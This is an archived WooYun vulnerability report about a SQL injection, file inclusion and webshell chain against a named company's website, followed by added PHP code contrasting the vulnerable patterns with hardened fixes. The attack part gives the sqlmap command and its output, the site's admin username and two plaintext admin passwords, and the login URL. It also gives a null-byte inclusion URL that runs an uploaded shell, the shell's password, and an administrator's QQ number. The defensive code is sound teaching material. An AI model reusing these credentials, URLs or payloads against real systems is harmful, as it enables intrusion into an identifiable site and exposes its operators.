WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-11-02: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-12-17: the vendor has actively ignored the vulnerability; details disclosed to the public.
迪讯信息技术公司 (Dixun Information Technology) SQL injection / file inclusion / getshell
sqlmap.py -u "http://www.dcominfo.com/product/index.php?type_id=9" --dbs
available databases [2]:
[*] dcominfo
[*] information_schema

Database: dcominfo
[10 tables]
+---------------------------+
| ruideman_cn_archives      |
| ruideman_cn_news          |
| ruideman_cn_news_type     |
| ruideman_cn_partners      |
| ruideman_cn_partners_type |
| ruideman_cn_pictures      |
| ruideman_cn_product       |
| ruideman_cn_product_type  |
| ruideman_cn_user          |
| ruideman_cn_xuhao         |
+---------------------------+

Database: dcominfo
Table: ruideman_cn_user
[37 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| answer            | varchar(40)      |
| area              | varchar(6)       |
| birthday          | date             |
| city              | varchar(6)       |
| clicktimes        | int(10) unsigned |
| company_type      | tinyint(3)       |
| education_type    | tinyint(3)       |
| email             | varchar(40)      |
| good_evaluate     | float            |
| integrity_grade   | tinyint(3)       |
| is_check          | tinyint(1)       |
| lastlog           | datetime         |
| marriage_type     | tinyint(3)       |
| nick_name         | varchar(50)      |
| pass              | tinyint(4)       |
| password          | varchar(32)      |
| province          | varchar(6)       |
| question          | varchar(40)      |
| real_name         | varchar(30)      |
| recommend_user_id | int(10)          |
| recommendflag     | tinyint(1)       |
| session_id        | char(32)         |
| sex               | tinyint(3)       |
| structon_tb       | text             |
| submit_date       | datetime         |
| thumbnail         | varchar(100)     |
| topflag           | tinyint(1)       |
| total_credit      | int(10)          |
| user_grade        | tinyint(1)       |
| user_group        | smallint(1)      |
| user_id           | int(10) unsigned |
| user_ip           | varchar(23)      |
| user_money        | float            |
| user_name         | varchar(30)      |
| user_popedom      | varchar(200)     |
| user_type         | tinyint(1)       |
| vocation_type     | tinyint(3)       |
+-------------------+------------------+

Database: dcominfo
Table: ruideman_cn_user
[1 entry]
+-----------+
| user_name |
+-----------+
| admin     |
+-----------+

Database: dcominfo
Table: ruideman_cn_user
[1 entry]
+----------+
| password |
+----------+
| ab0528   |
+----------+
Admin backend login:
http://www.dcominfo.com/admin/login.php
The administrator just went and changed the password again... WooYun... but the password is still stored in plaintext (the `password` column is varchar(32), yet it holds the literal value rather than a hash). New password: DcomXGA0528

Logged into the backend and uploaded a shell disguised as an image, then included it through the file-inclusion bug in wap/detail.php. The %00 appended to the .jpg path truncates whatever the script adds after the `mod` value, so the uploaded file is executed as PHP:
http://www.dcominfo.com/wap/detail.php?mod=/uploadfile/product/s/1/46_1446271963.jpg%00
Shell password: 1

Shell obtained (getshell).
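The three weaknesses chained in this report, each written as the vulnerable pattern beside a hardened form. This is an added example, not code from dcominfo.com or from the report: the request parameters (`type_id`, `mod`), the table and column names and the upload path are taken from the report, while the function names, the `$pdo`/`$db` handles, the module map and the exact shape of the original scripts are assumptions. The null-byte truncation in the `mod` parameter only works on PHP older than 5.3.4, which rejects paths containing NUL; that the report's payload worked implies the site ran an older interpreter.

```php
<?php
// Added example, not code from the vulnerable site. Parameter names, table and
// column names and the upload path follow the report; everything else is assumed.

// 1. SQL injection: product/index.php?type_id=9
//    Vulnerable (assumed shape): the raw query-string value is concatenated into
//    SQL, which is all sqlmap needs to enumerate every table in `dcominfo`.
function productsByTypeVulnerable(mysqli $db, array $get)
{
    $sql = "SELECT * FROM ruideman_cn_product WHERE type_id = " . $get['type_id'];
    return $db->query($sql);
}

//    Hardened: the value must be a positive integer and is bound as a parameter,
//    so it can never be parsed as SQL.
function productsByType(PDO $pdo, array $get): array
{
    $typeId = filter_var(
        $get['type_id'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($typeId === false) {
        http_response_code(400);
        return [];
    }
    $stmt = $pdo->prepare('SELECT * FROM ruideman_cn_product WHERE type_id = :id');
    $stmt->bindValue(':id', $typeId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 2. File inclusion: wap/detail.php?mod=/uploadfile/product/s/1/46_1446271963.jpg%00
//    Vulnerable (assumed shape): the script appends a fixed suffix to an
//    attacker-controlled path. Before PHP 5.3.4 the %00 terminates the C string,
//    the suffix is dropped, and the "image" uploaded through the admin panel is
//    included and executed as PHP.
function loadModuleVulnerable(array $get): void
{
    include $_SERVER['DOCUMENT_ROOT'] . $get['mod'] . '.php';
}

//    Hardened: the request chooses a key in a fixed map, never a path, so nothing
//    the client sends reaches include(). The map entries are assumed.
const MODULES = [
    'detail' => __DIR__ . '/modules/detail.php',
    'list'   => __DIR__ . '/modules/list.php',
];

function loadModule(array $get): void
{
    $key = (string) ($get['mod'] ?? 'detail');
    if (!array_key_exists($key, MODULES)) {
        http_response_code(404);
        return;
    }
    include MODULES[$key];
}

// 3. Plaintext password: ruideman_cn_user.password holds "ab0528" as typed.
//    Vulnerable: login compares the literal string, so the SQLi dump above is
//    directly a working admin credential, and resetting it to DcomXGA0528
//    changed nothing while the injection remains.
function loginVulnerable(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT 1 FROM ruideman_cn_user WHERE user_name = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    return (bool) $stmt->fetchColumn();
}

//    Hardened: store a salted bcrypt hash and compare with password_verify().
//    The column must first be widened: varchar(32) cannot hold a 60-character
//    bcrypt hash.
function setPassword(PDO $pdo, int $userId, string $pass): void
{
    $stmt = $pdo->prepare('UPDATE ruideman_cn_user SET password = ? WHERE user_id = ?');
    $stmt->execute([password_hash($pass, PASSWORD_BCRYPT), $userId]);
}

function login(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password FROM ruideman_cn_user WHERE user_name = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return $hash !== false && password_verify($pass, $hash);
}
```

The fixes are independent, and each one alone breaks the chain at a different point: binding `type_id` stops the credential dump, the module map stops the include of an uploaded file even if one lands under `/uploadfile/`, and hashing means a future dump of the `password` column yields nothing usable. Upload handling is not shown in the report, but the same practitioner would also store uploads outside the document root or in a directory where the web server does not execute scripts.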
In summary:
I have already spoken with the administrator and they will come to claim the report. Please approve it. Administrator QQ: 2250832217
Vendor response: unable to contact the vendor, or the vendor actively refused.